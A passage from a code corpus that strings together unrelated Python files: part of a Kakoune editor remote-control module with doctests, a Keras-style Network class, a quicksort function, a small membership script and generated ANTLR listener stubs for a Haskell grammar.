    def selection_desc(x):
        """
        Parse a Kakoune selection description.
        """
        return tuple(map(Args.coord, x.split(',')))
    @staticmethod
    def string(x):
        """
        Parse a Kakoune string.
        """
        return x
    @staticmethod
    def listof(p):
        r"""
        Parse a Kakoune list of p.
        >>> import random
        >>> def random_fragment():
        ...     return ''.join(random.sample(':\\abc', random.randrange(1, 5)))
        >>> def test(n):
        ...     xs = [random_fragment() for _ in range(n)]
        ...     if xs and xs[-1] == '':
        ...         xs[-1] = 'c'
        ...     exs = ':'.join(utils.backslash_escape('\\:', s) for s in xs)
        ...     xs2 = Args.listof(Args.string)(exs)
        ...     assert(xs == xs2)
        >>> for n in range(0, 10):
        ...     test(n)
        """
        def rmlastcolon(s):
            # Each regex match keeps its trailing separator; strip it.
            if s and s[-1] == ':':
                return s[:-1]
            else:
                return s
        def inner(s):
            # Split on unescaped ':' (an even number of backslashes may
            # precede it); the final element has no trailing separator.
            ms = [m.group(0)
                  for m in re.finditer(r'(.*?(?<!\\)(\\\\)*:|.+)', s)]
            ms = [m if i == len(ms) - 1 else rmlastcolon(m)
                  for i, m in enumerate(ms)]
            # Unescape '\x' -> 'x', then parse each element with p.
            return [p(re.sub(r'\\(.)', r'\g<1>', x)) for x in ms]
        return inner
    @staticmethod
    def boolean(s):
        """
        Parse a Kakoune boolean.
        """
        return s == 'true'
    @staticmethod
    def args_parse(s):
        # '_S'-separated shell args; drop the empty leading field and
        # undo the '_u' escaping.
        return tuple(x.replace('_u', '_') for x in s.split('_S')[1:])
    @staticmethod
    def argsetup(argnames, config):
        """
        Map requested argnames to (shell splices, line parser).

        Unknown names are silently skipped (KeyError swallowed), so callers
        may over-ask.
        >>> s, _ = Args.argsetup('client cmd reply'.split(), {'cmd': ('a', int)})
        >>> print(s)
        ['kak_client', 'a']
        """
        args = []
        splices = []
        for name in argnames:
            try:
                if name in config:
                    splice, parse = config[name]
                else:
                    splice, parse = _arg_config[name]
                splices.append(splice)
                args.append((name, parse))
            except KeyError:
                pass
        def parse(line):
            _debug(argnames, line)
            # Undo '_n'/'_u' escaping per field, then apply each parser.
            params = [v.replace('_n', '\n').replace('_u', '_')
                      for v in line.split('_s')]
            return {name: parse(value)
                    for (name, parse), value in zip(args, params)}
        return splices, parse
# Default mapping from friendly argument names to (shell splice, parser).
# Consulted by Args.argsetup when a name is absent from the per-Remote
# arg_config.  (The 'readonly' entry was duplicated verbatim; one copy
# removed — dict literals silently collapse duplicate keys, so behavior
# is unchanged.)
_arg_config = {
    'line': ('kak_cursor_line', int),
    'column': ('kak_cursor_column', int),
    'aligntab': ('kak_opt_aligntab', Args.boolean),
    'filetype': ('kak_opt_filetype', Args.string),
    'indentwidth': ('kak_opt_indentwidth', int),
    'readonly': ('kak_opt_readonly', Args.boolean),
    'tabstop': ('kak_opt_tabstop', int),
    'completers': ('kak_opt_completers', Args.listof(Args.string)),
    'pwd': ('PWD', Args.string),
    'PWD': ('PWD', Args.string),
    'PATH': ('PATH', Args.string),
    'HOME': ('HOME', Args.string),
    'args': ('__args', Args.args_parse),
    'arg1': ('1', Args.string),
    'arg2': ('2', Args.string),
    'arg3': ('3', Args.string),
    'arg4': ('4', Args.string),
    'arg5': ('5', Args.string),
    'arg6': ('6', Args.string),
    'arg7': ('7', Args.string),
    'arg8': ('8', Args.string),
    'arg9': ('9', Args.string),
    'bufname': ('kak_bufname', Args.string),
    'buffile': ('kak_buffile', Args.string),
    'buflist': ('kak_buflist', Args.listof(Args.string)),
    'timestamp': ('kak_timestamp', int),
    'selection': ('kak_selection', Args.string),
    'selections': ('kak_selections', Args.listof(Args.string)),
    'runtime': ('kak_runtime', Args.string),
    'session': ('kak_session', Args.string),
    'client': ('kak_client', Args.string),
    'cursor_line': ('kak_cursor_line', int),
    'cursor_column': ('kak_cursor_column', int),
    'cursor_char_column': ('kak_cursor_char_column', int),
    'cursor_byte_offset': ('kak_cursor_byte_offset', int),
    'selection_desc': ('kak_selection_desc', Args.selection_desc),
    'selections_desc': ('kak_selections_desc', Args.listof(Args.selection_desc)),
    'window_width': ('kak_window_width', int),
    'window_height': ('kak_window_height', int),
}
#############################################################################
# Private utils
def _mkfifo(active_fifos={}):
    """Create a fresh fifo in its own temp dir; return (path, cleanup_fn).

    NOTE: the mutable default dict is deliberate — it is a module-wide
    registry of live fifos that _fifo_cleanup reads back out through
    ``_mkfifo.__defaults__[0]``.  Do not "fix" it.
    """
    fifo_dir = tempfile.mkdtemp()
    fifo_path = os.path.join(fifo_dir, 'fifo')
    os.mkfifo(fifo_path)
    def remove_fifo():
        # Deregister first so _fifo_cleanup never pokes a dead fifo.
        del active_fifos[fifo_path]
        os.remove(fifo_path)
        os.rmdir(fifo_dir)
    active_fifos[fifo_path] = remove_fifo
    return fifo_path, remove_fifo
def _fifo_cleanup():
    """
    Writes _q to all open fifos created by _mkfifo.

    '_q' is the quit sentinel recognized by Remote.listen; each write makes
    the listener's cleanup run, which in turn deregisters the fifo.
    """
    registry = _mkfifo.__defaults__[0]
    for fifo_path in list(six.iterkeys(registry)):
        with open(fifo_path, 'w') as handle:
            handle.write('_q\n')
            handle.flush()
def _debug(*xs):
if '-d' in sys.argv[1:]:
print(*xs, file=sys.stderr)
#############################################################################
# Tests
def headless(ui='dummy', stdout=None):
    """
    Start a headless Kakoune process.

    Runs ``kak -n`` (no config) with the given UI and returns the Popen
    handle after a short pause that lets the process come up.
    """
    proc = Popen(['kak', '-n', '-ui', ui], stdout=stdout)
    time.sleep(0.01)  # give kak a moment to start listening
    return proc
def _test_remote_commands_sync():
    # Doctest-only container: exercises Remote.command / Remote.onclient
    # round-trips against a live headless Kakoune with sync=True, so each
    # step completes before the next.  Body is intentionally just `pass`;
    # the docstring below IS the test (run via doctest.testmod in __main__)
    # and must not be edited casually.
    u"""
    >>> kak = headless()
    >>> @Remote.command(kak.pid, sync_setup=True)
    ... def write_position(line, column, pipe):
    ...     pipe(utils.join(('exec ', 'a', str(line), ':', str(column), '<esc>'), sep=''), sync=True)
    >>> pipe(kak.pid, 'write-position', 'unnamed0', sync=True)
    >>> pipe(kak.pid, 'exec a,<space><esc>', 'unnamed0', sync=True)
    >>> write_position('unnamed0')
    >>> pipe(kak.pid, 'exec \%H', 'unnamed0', sync=True)
    >>> print(Remote.onclient(kak.pid, 'unnamed0')(
    ...     lambda selection: selection))
    1:1, 1:5
    >>> r = Remote(kak.pid)
    >>> r.puns = False
    >>> r.required_names.add('selection')
    >>> print(r.onclient(r, 'unnamed0', sync=True)(lambda d: d['selection']))
    1:1, 1:5
    >>> q = Queue()
    >>> Remote.onclient(kak.pid, 'unnamed0', sync=False)(
    ...     lambda selection: q.put(selection))
    >>> print(q.get())
    1:1, 1:5
    >>> pipe(kak.pid, 'quit!', 'unnamed0')
    >>> kak.wait()
    0
    >>> _fifo_cleanup()
    """
    pass
def _test_unicode_and_escaping():
    # Doctest-only container: verifies that non-ASCII text and the literal
    # escape tokens '_s', '_u', '_n' survive the fifo encoding round-trip.
    # The docstring IS the test; do not edit it casually.
    u"""
    >>> kak = headless()
    >>> pipe(kak.pid, u'exec iapa_bepa<ret>åäö_s_u_n<esc>%H', 'unnamed0')
    >>> call = Remote.onclient(kak.pid, 'unnamed0')
    >>> print(call(lambda selection: selection))
    apa_bepa
    åäö_s_u_n
    >>> print(call(lambda selection_desc: selection_desc))
    ((1, 1), (2, 12))
    >>> pipe(kak.pid, 'quit!', 'unnamed0')
    >>> kak.wait()
    0
    >>> _fifo_cleanup()
    """
    pass
def _test_remote_commands_async():
    # Doctest-only container: same flow as the sync test, but without
    # sync_setup, so sleeps are needed to let the async setup land before
    # the command is invoked.  The docstring IS the test; do not edit it
    # casually.
    u"""
    >>> kak = headless()
    >>> @Remote.command(kak.pid)
    ... def write_position(pipe, line, column):
    ...     pipe(utils.join(('exec ', 'a', str(line), ':', str(column), '<esc>'), sep=''))
    >>> pipe(kak.pid, 'write-position', 'unnamed0')
    >>> time.sleep(0.05)
    >>> pipe(kak.pid, 'exec a,<space><esc>', 'unnamed0', sync=True)
    >>> time.sleep(0.02)
    >>> write_position('unnamed0')
    >>> pipe(kak.pid, 'exec \%H', 'unnamed0', sync=True)
    >>> Remote.onclient(kak.pid, 'unnamed0')(lambda selection: print(selection))
    1:1, 1:5
    >>> q = Queue()
    >>> Remote.onclient(kak.pid, 'unnamed0', sync=False)(lambda selection: q.put(selection))
    >>> print(q.get())
    1:1, 1:5
    >>> pipe(kak.pid, 'quit!', 'unnamed0')
    >>> kak.wait()
    0
    >>> _fifo_cleanup()
    """
    pass
def _test_commands_with_params():
    # Doctest-only container: checks variadic command parameters ('2..')
    # and the '_S'/'_u'/'_s'/'_n' argument escaping, called both from
    # Python and from Kakoune.  The docstring IS the test; do not edit it
    # casually.
    u"""
    >>> kak = headless()
    >>> @Remote.command(kak.pid, params='2..', sync_python_calls=True)
    ... def test(arg1, arg2, args):
    ...     print(', '.join((arg1, arg2) + args[2:]))
    >>> test(None, 'one', 'two', 'three', 'four')
    one, two, three, four
    >>> test(None, 'a\\nb', 'c_d', 'e_sf', 'g_u_n__ __n_S_s__Sh')
    a
    b, c_d, e_sf, g_u_n__ __n_S_s__Sh
    >>> pipe(kak.pid, "test 'a\\nb' c_d e_sf 'g_u_n__ __n_S_s__Sh'", sync=True)
    a
    b, c_d, e_sf, g_u_n__ __n_S_s__Sh
    >>> pipe(kak.pid, 'quit!', 'unnamed0')
    >>> kak.wait()
    0
    >>> _fifo_cleanup()
    """
    pass
#############################################################################
# Main
if __name__ == '__main__':
    # Run the module's doctests (the _test_* docstrings above); pass -d on
    # the command line to also enable _debug output while they run.
    import doctest
    doctest.testmod()
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# Codes are based on:
#
# <https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/keras/engine/network.py>
#
# ------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from dragon.core.util import nest
from dragon.vm.tensorflow.core.keras.engine import base_layer
class Network(base_layer.Layer):
    """Compose a group of layers."""
    def __init__(self, *args, **kwargs):
        """Initialize bookkeeping and dispatch to graph or subclassed mode.

        Graph mode is chosen when (inputs, outputs) are supplied — as two
        positional args, as one positional arg plus an ``outputs`` kwarg,
        or as both kwargs; anything else is treated as a subclassed model.
        """
        super(Network, self).__init__(**kwargs)
        self._thread_local = threading.local()
        self._is_compiled = False
        # Accumulators populated during training/inference.
        self._updates = []
        self._losses = []
        self._metrics = []
        self.inputs = []
        self.outputs = []
        # A subclass may have set its own optimizer before calling super().
        if not hasattr(self, 'optimizer'):
            self.optimizer = None
        # Note: `and` binds tighter than `or`, so this reads as three
        # alternative (inputs, outputs) spellings — see docstring.
        if (len(args) == 2 or
                len(args) == 1 and 'outputs' in kwargs or
                'inputs' in kwargs and 'outputs' in kwargs):
            self._init_graph_network(*args, **kwargs)
        else:
            self._init_subclassed_network(**kwargs)
    def _init_graph_network(self, inputs, outputs, **kwargs):
        """Record flattened inputs/outputs for a functional-style network."""
        self._is_graph_network = True
        # Unwrap single-element lists so scalar-like access works.
        if isinstance(inputs, list) and len(nest.flatten(inputs)) == 1:
            inputs = inputs[0]
        if isinstance(outputs, list) and len(nest.flatten(outputs)) == 1:
            outputs = outputs[0]
        # Keep both the original (possibly nested) structure and the
        # flattened lists.
        self._nested_outputs = outputs
        self._nested_inputs = inputs
        self.inputs = nest.flatten(inputs)
        self.outputs = nest.flatten(outputs)
        self.built = True
    def _init_subclassed_network(self, **kwargs):
        """Subclassed mode: the model builds lazily on first call."""
        self._is_graph_network = False
        self.built = False
|
nilq/baby-python
|
python
|
# Read the array length n and the target a, then the array itself, and
# report whether a occurs in the array.
n, a = map(int, input().split())
arr = list(map(int, input().split()))
print("yes" if a in arr else "no")
|
nilq/baby-python
|
python
|
def quicksort(list):
    """Return a sorted copy of *list* via three-way quicksort.

    The input is not modified.  Elements equal to the pivot are grouped,
    so duplicate-heavy inputs do not degrade to quadratic recursion on
    the equal run.  Single partition pass per level (the original made
    three separate passes).

    NOTE: the parameter name shadows the builtin ``list``; kept as-is for
    backward compatibility with keyword callers.
    """
    if len(list) <= 1:
        return list
    pivot = list[0]
    lesser, pivots, greater = [], [], []
    for item in list:
        if item < pivot:
            lesser.append(item)
        elif item > pivot:
            greater.append(item)
        else:
            pivots.append(item)
    return quicksort(lesser) + pivots + quicksort(greater)
|
nilq/baby-python
|
python
|
# Generated from HaskellParser.g4 by ANTLR 4.9.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .HaskellParser import HaskellParser
else:
from HaskellParser import HaskellParser
# This class defines a complete listener for a parse tree produced by HaskellParser.
class HaskellParserListener(ParseTreeListener):
# Enter a parse tree produced by HaskellParser#module.
def enterModule(self, ctx:HaskellParser.ModuleContext):
pass
# Exit a parse tree produced by HaskellParser#module.
def exitModule(self, ctx:HaskellParser.ModuleContext):
pass
# Enter a parse tree produced by HaskellParser#module_content.
def enterModule_content(self, ctx:HaskellParser.Module_contentContext):
pass
# Exit a parse tree produced by HaskellParser#module_content.
def exitModule_content(self, ctx:HaskellParser.Module_contentContext):
pass
# Enter a parse tree produced by HaskellParser#where_module.
def enterWhere_module(self, ctx:HaskellParser.Where_moduleContext):
pass
# Exit a parse tree produced by HaskellParser#where_module.
def exitWhere_module(self, ctx:HaskellParser.Where_moduleContext):
pass
# Enter a parse tree produced by HaskellParser#module_body.
def enterModule_body(self, ctx:HaskellParser.Module_bodyContext):
pass
# Exit a parse tree produced by HaskellParser#module_body.
def exitModule_body(self, ctx:HaskellParser.Module_bodyContext):
pass
# Enter a parse tree produced by HaskellParser#pragmas.
def enterPragmas(self, ctx:HaskellParser.PragmasContext):
pass
# Exit a parse tree produced by HaskellParser#pragmas.
def exitPragmas(self, ctx:HaskellParser.PragmasContext):
pass
# Enter a parse tree produced by HaskellParser#pragma.
def enterPragma(self, ctx:HaskellParser.PragmaContext):
pass
# Exit a parse tree produced by HaskellParser#pragma.
def exitPragma(self, ctx:HaskellParser.PragmaContext):
pass
# Enter a parse tree produced by HaskellParser#language_pragma.
def enterLanguage_pragma(self, ctx:HaskellParser.Language_pragmaContext):
pass
# Exit a parse tree produced by HaskellParser#language_pragma.
def exitLanguage_pragma(self, ctx:HaskellParser.Language_pragmaContext):
pass
# Enter a parse tree produced by HaskellParser#options_ghc.
def enterOptions_ghc(self, ctx:HaskellParser.Options_ghcContext):
pass
# Exit a parse tree produced by HaskellParser#options_ghc.
def exitOptions_ghc(self, ctx:HaskellParser.Options_ghcContext):
pass
# Enter a parse tree produced by HaskellParser#simple_options.
def enterSimple_options(self, ctx:HaskellParser.Simple_optionsContext):
pass
# Exit a parse tree produced by HaskellParser#simple_options.
def exitSimple_options(self, ctx:HaskellParser.Simple_optionsContext):
pass
# Enter a parse tree produced by HaskellParser#extension.
def enterExtension(self, ctx:HaskellParser.ExtensionContext):
pass
# Exit a parse tree produced by HaskellParser#extension.
def exitExtension(self, ctx:HaskellParser.ExtensionContext):
pass
# Enter a parse tree produced by HaskellParser#body.
def enterBody(self, ctx:HaskellParser.BodyContext):
pass
# Exit a parse tree produced by HaskellParser#body.
def exitBody(self, ctx:HaskellParser.BodyContext):
pass
# Enter a parse tree produced by HaskellParser#impdecls.
def enterImpdecls(self, ctx:HaskellParser.ImpdeclsContext):
pass
# Exit a parse tree produced by HaskellParser#impdecls.
def exitImpdecls(self, ctx:HaskellParser.ImpdeclsContext):
pass
# Enter a parse tree produced by HaskellParser#exports.
def enterExports(self, ctx:HaskellParser.ExportsContext):
pass
# Exit a parse tree produced by HaskellParser#exports.
def exitExports(self, ctx:HaskellParser.ExportsContext):
pass
# Enter a parse tree produced by HaskellParser#exprt.
def enterExprt(self, ctx:HaskellParser.ExprtContext):
pass
# Exit a parse tree produced by HaskellParser#exprt.
def exitExprt(self, ctx:HaskellParser.ExprtContext):
pass
# Enter a parse tree produced by HaskellParser#impdecl.
def enterImpdecl(self, ctx:HaskellParser.ImpdeclContext):
pass
# Exit a parse tree produced by HaskellParser#impdecl.
def exitImpdecl(self, ctx:HaskellParser.ImpdeclContext):
pass
# Enter a parse tree produced by HaskellParser#impspec.
def enterImpspec(self, ctx:HaskellParser.ImpspecContext):
pass
# Exit a parse tree produced by HaskellParser#impspec.
def exitImpspec(self, ctx:HaskellParser.ImpspecContext):
pass
# Enter a parse tree produced by HaskellParser#himport.
def enterHimport(self, ctx:HaskellParser.HimportContext):
pass
# Exit a parse tree produced by HaskellParser#himport.
def exitHimport(self, ctx:HaskellParser.HimportContext):
pass
# Enter a parse tree produced by HaskellParser#cname.
def enterCname(self, ctx:HaskellParser.CnameContext):
pass
# Exit a parse tree produced by HaskellParser#cname.
def exitCname(self, ctx:HaskellParser.CnameContext):
pass
# Enter a parse tree produced by HaskellParser#fixity.
def enterFixity(self, ctx:HaskellParser.FixityContext):
pass
# Exit a parse tree produced by HaskellParser#fixity.
def exitFixity(self, ctx:HaskellParser.FixityContext):
pass
# Enter a parse tree produced by HaskellParser#ops.
def enterOps(self, ctx:HaskellParser.OpsContext):
pass
# Exit a parse tree produced by HaskellParser#ops.
def exitOps(self, ctx:HaskellParser.OpsContext):
pass
# Enter a parse tree produced by HaskellParser#topdecls.
def enterTopdecls(self, ctx:HaskellParser.TopdeclsContext):
pass
# Exit a parse tree produced by HaskellParser#topdecls.
def exitTopdecls(self, ctx:HaskellParser.TopdeclsContext):
pass
# Enter a parse tree produced by HaskellParser#topdecl.
def enterTopdecl(self, ctx:HaskellParser.TopdeclContext):
pass
# Exit a parse tree produced by HaskellParser#topdecl.
def exitTopdecl(self, ctx:HaskellParser.TopdeclContext):
pass
# Enter a parse tree produced by HaskellParser#cl_decl.
def enterCl_decl(self, ctx:HaskellParser.Cl_declContext):
pass
# Exit a parse tree produced by HaskellParser#cl_decl.
def exitCl_decl(self, ctx:HaskellParser.Cl_declContext):
pass
# Enter a parse tree produced by HaskellParser#ty_decl.
def enterTy_decl(self, ctx:HaskellParser.Ty_declContext):
pass
# Exit a parse tree produced by HaskellParser#ty_decl.
def exitTy_decl(self, ctx:HaskellParser.Ty_declContext):
pass
# Enter a parse tree produced by HaskellParser#standalone_kind_sig.
def enterStandalone_kind_sig(self, ctx:HaskellParser.Standalone_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#standalone_kind_sig.
def exitStandalone_kind_sig(self, ctx:HaskellParser.Standalone_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#sks_vars.
def enterSks_vars(self, ctx:HaskellParser.Sks_varsContext):
pass
# Exit a parse tree produced by HaskellParser#sks_vars.
def exitSks_vars(self, ctx:HaskellParser.Sks_varsContext):
pass
# Enter a parse tree produced by HaskellParser#inst_decl.
def enterInst_decl(self, ctx:HaskellParser.Inst_declContext):
pass
# Exit a parse tree produced by HaskellParser#inst_decl.
def exitInst_decl(self, ctx:HaskellParser.Inst_declContext):
pass
# Enter a parse tree produced by HaskellParser#overlap_pragma.
def enterOverlap_pragma(self, ctx:HaskellParser.Overlap_pragmaContext):
pass
# Exit a parse tree produced by HaskellParser#overlap_pragma.
def exitOverlap_pragma(self, ctx:HaskellParser.Overlap_pragmaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_strategy_no_via.
def enterDeriv_strategy_no_via(self, ctx:HaskellParser.Deriv_strategy_no_viaContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_strategy_no_via.
def exitDeriv_strategy_no_via(self, ctx:HaskellParser.Deriv_strategy_no_viaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_strategy_via.
def enterDeriv_strategy_via(self, ctx:HaskellParser.Deriv_strategy_viaContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_strategy_via.
def exitDeriv_strategy_via(self, ctx:HaskellParser.Deriv_strategy_viaContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_standalone_strategy.
def enterDeriv_standalone_strategy(self, ctx:HaskellParser.Deriv_standalone_strategyContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_standalone_strategy.
def exitDeriv_standalone_strategy(self, ctx:HaskellParser.Deriv_standalone_strategyContext):
pass
# Enter a parse tree produced by HaskellParser#opt_injective_info.
def enterOpt_injective_info(self, ctx:HaskellParser.Opt_injective_infoContext):
pass
# Exit a parse tree produced by HaskellParser#opt_injective_info.
def exitOpt_injective_info(self, ctx:HaskellParser.Opt_injective_infoContext):
pass
# Enter a parse tree produced by HaskellParser#injectivity_cond.
def enterInjectivity_cond(self, ctx:HaskellParser.Injectivity_condContext):
pass
# Exit a parse tree produced by HaskellParser#injectivity_cond.
def exitInjectivity_cond(self, ctx:HaskellParser.Injectivity_condContext):
pass
# Enter a parse tree produced by HaskellParser#inj_varids.
def enterInj_varids(self, ctx:HaskellParser.Inj_varidsContext):
pass
# Exit a parse tree produced by HaskellParser#inj_varids.
def exitInj_varids(self, ctx:HaskellParser.Inj_varidsContext):
pass
# Enter a parse tree produced by HaskellParser#where_type_family.
def enterWhere_type_family(self, ctx:HaskellParser.Where_type_familyContext):
pass
# Exit a parse tree produced by HaskellParser#where_type_family.
def exitWhere_type_family(self, ctx:HaskellParser.Where_type_familyContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqn_list.
def enterTy_fam_inst_eqn_list(self, ctx:HaskellParser.Ty_fam_inst_eqn_listContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqn_list.
def exitTy_fam_inst_eqn_list(self, ctx:HaskellParser.Ty_fam_inst_eqn_listContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqns.
def enterTy_fam_inst_eqns(self, ctx:HaskellParser.Ty_fam_inst_eqnsContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqns.
def exitTy_fam_inst_eqns(self, ctx:HaskellParser.Ty_fam_inst_eqnsContext):
pass
# Enter a parse tree produced by HaskellParser#ty_fam_inst_eqn.
def enterTy_fam_inst_eqn(self, ctx:HaskellParser.Ty_fam_inst_eqnContext):
pass
# Exit a parse tree produced by HaskellParser#ty_fam_inst_eqn.
def exitTy_fam_inst_eqn(self, ctx:HaskellParser.Ty_fam_inst_eqnContext):
pass
# Enter a parse tree produced by HaskellParser#at_decl_cls.
def enterAt_decl_cls(self, ctx:HaskellParser.At_decl_clsContext):
pass
# Exit a parse tree produced by HaskellParser#at_decl_cls.
def exitAt_decl_cls(self, ctx:HaskellParser.At_decl_clsContext):
pass
# Enter a parse tree produced by HaskellParser#at_decl_inst.
def enterAt_decl_inst(self, ctx:HaskellParser.At_decl_instContext):
pass
# Exit a parse tree produced by HaskellParser#at_decl_inst.
def exitAt_decl_inst(self, ctx:HaskellParser.At_decl_instContext):
pass
# Enter a parse tree produced by HaskellParser#opt_kind_sig.
def enterOpt_kind_sig(self, ctx:HaskellParser.Opt_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_kind_sig.
def exitOpt_kind_sig(self, ctx:HaskellParser.Opt_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_datafam_kind_sig.
def enterOpt_datafam_kind_sig(self, ctx:HaskellParser.Opt_datafam_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_datafam_kind_sig.
def exitOpt_datafam_kind_sig(self, ctx:HaskellParser.Opt_datafam_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_tyfam_kind_sig.
def enterOpt_tyfam_kind_sig(self, ctx:HaskellParser.Opt_tyfam_kind_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_tyfam_kind_sig.
def exitOpt_tyfam_kind_sig(self, ctx:HaskellParser.Opt_tyfam_kind_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_at_kind_inj_sig.
def enterOpt_at_kind_inj_sig(self, ctx:HaskellParser.Opt_at_kind_inj_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_at_kind_inj_sig.
def exitOpt_at_kind_inj_sig(self, ctx:HaskellParser.Opt_at_kind_inj_sigContext):
pass
# Enter a parse tree produced by HaskellParser#tycl_hdr.
def enterTycl_hdr(self, ctx:HaskellParser.Tycl_hdrContext):
pass
# Exit a parse tree produced by HaskellParser#tycl_hdr.
def exitTycl_hdr(self, ctx:HaskellParser.Tycl_hdrContext):
pass
# Enter a parse tree produced by HaskellParser#tycl_hdr_inst.
def enterTycl_hdr_inst(self, ctx:HaskellParser.Tycl_hdr_instContext):
pass
# Exit a parse tree produced by HaskellParser#tycl_hdr_inst.
def exitTycl_hdr_inst(self, ctx:HaskellParser.Tycl_hdr_instContext):
pass
# Enter a parse tree produced by HaskellParser#capi_ctype.
def enterCapi_ctype(self, ctx:HaskellParser.Capi_ctypeContext):
pass
# Exit a parse tree produced by HaskellParser#capi_ctype.
def exitCapi_ctype(self, ctx:HaskellParser.Capi_ctypeContext):
pass
# Enter a parse tree produced by HaskellParser#standalone_deriving.
def enterStandalone_deriving(self, ctx:HaskellParser.Standalone_derivingContext):
pass
# Exit a parse tree produced by HaskellParser#standalone_deriving.
def exitStandalone_deriving(self, ctx:HaskellParser.Standalone_derivingContext):
pass
# Enter a parse tree produced by HaskellParser#role_annot.
def enterRole_annot(self, ctx:HaskellParser.Role_annotContext):
pass
# Exit a parse tree produced by HaskellParser#role_annot.
# NOTE(review): auto-generated ANTLR4 listener stubs for the HaskellParser
# grammar. Do not hand-edit -- regenerate from the .g4 grammar instead.
# Every enter*/exit* hook below is intentionally a no-op; to react to a rule,
# subclass this listener and override the corresponding method.
def exitRole_annot(self, ctx:HaskellParser.Role_annotContext):
    pass
# Enter a parse tree produced by HaskellParser#roles.
def enterRoles(self, ctx:HaskellParser.RolesContext):
    pass
# Exit a parse tree produced by HaskellParser#roles.
def exitRoles(self, ctx:HaskellParser.RolesContext):
    pass
# Enter a parse tree produced by HaskellParser#role.
def enterRole(self, ctx:HaskellParser.RoleContext):
    pass
# Exit a parse tree produced by HaskellParser#role.
def exitRole(self, ctx:HaskellParser.RoleContext):
    pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_decl.
def enterPattern_synonym_decl(self, ctx:HaskellParser.Pattern_synonym_declContext):
    pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_decl.
def exitPattern_synonym_decl(self, ctx:HaskellParser.Pattern_synonym_declContext):
    pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_lhs.
def enterPattern_synonym_lhs(self, ctx:HaskellParser.Pattern_synonym_lhsContext):
    pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_lhs.
def exitPattern_synonym_lhs(self, ctx:HaskellParser.Pattern_synonym_lhsContext):
    pass
# Enter a parse tree produced by HaskellParser#hvars.
def enterHvars(self, ctx:HaskellParser.HvarsContext):
    pass
# Exit a parse tree produced by HaskellParser#hvars.
def exitHvars(self, ctx:HaskellParser.HvarsContext):
    pass
# Enter a parse tree produced by HaskellParser#cvars.
def enterCvars(self, ctx:HaskellParser.CvarsContext):
    pass
# Exit a parse tree produced by HaskellParser#cvars.
def exitCvars(self, ctx:HaskellParser.CvarsContext):
    pass
# Enter a parse tree produced by HaskellParser#where_decls.
def enterWhere_decls(self, ctx:HaskellParser.Where_declsContext):
    pass
# Exit a parse tree produced by HaskellParser#where_decls.
def exitWhere_decls(self, ctx:HaskellParser.Where_declsContext):
    pass
# Enter a parse tree produced by HaskellParser#pattern_synonym_sig.
def enterPattern_synonym_sig(self, ctx:HaskellParser.Pattern_synonym_sigContext):
    pass
# Exit a parse tree produced by HaskellParser#pattern_synonym_sig.
def exitPattern_synonym_sig(self, ctx:HaskellParser.Pattern_synonym_sigContext):
    pass
# Enter a parse tree produced by HaskellParser#decl_cls.
def enterDecl_cls(self, ctx:HaskellParser.Decl_clsContext):
    pass
# Exit a parse tree produced by HaskellParser#decl_cls.
def exitDecl_cls(self, ctx:HaskellParser.Decl_clsContext):
    pass
# Enter a parse tree produced by HaskellParser#decls_cls.
def enterDecls_cls(self, ctx:HaskellParser.Decls_clsContext):
    pass
# Exit a parse tree produced by HaskellParser#decls_cls.
def exitDecls_cls(self, ctx:HaskellParser.Decls_clsContext):
    pass
# Enter a parse tree produced by HaskellParser#decllist_cls.
def enterDecllist_cls(self, ctx:HaskellParser.Decllist_clsContext):
    pass
# Exit a parse tree produced by HaskellParser#decllist_cls.
def exitDecllist_cls(self, ctx:HaskellParser.Decllist_clsContext):
    pass
# Enter a parse tree produced by HaskellParser#where_cls.
def enterWhere_cls(self, ctx:HaskellParser.Where_clsContext):
    pass
# Exit a parse tree produced by HaskellParser#where_cls.
def exitWhere_cls(self, ctx:HaskellParser.Where_clsContext):
    pass
# Enter a parse tree produced by HaskellParser#decl_inst.
def enterDecl_inst(self, ctx:HaskellParser.Decl_instContext):
    pass
# Exit a parse tree produced by HaskellParser#decl_inst.
def exitDecl_inst(self, ctx:HaskellParser.Decl_instContext):
    pass
# Enter a parse tree produced by HaskellParser#decls_inst.
def enterDecls_inst(self, ctx:HaskellParser.Decls_instContext):
    pass
# Exit a parse tree produced by HaskellParser#decls_inst.
def exitDecls_inst(self, ctx:HaskellParser.Decls_instContext):
    pass
# Enter a parse tree produced by HaskellParser#decllist_inst.
def enterDecllist_inst(self, ctx:HaskellParser.Decllist_instContext):
    pass
# Exit a parse tree produced by HaskellParser#decllist_inst.
def exitDecllist_inst(self, ctx:HaskellParser.Decllist_instContext):
    pass
# Enter a parse tree produced by HaskellParser#where_inst.
def enterWhere_inst(self, ctx:HaskellParser.Where_instContext):
    pass
# Exit a parse tree produced by HaskellParser#where_inst.
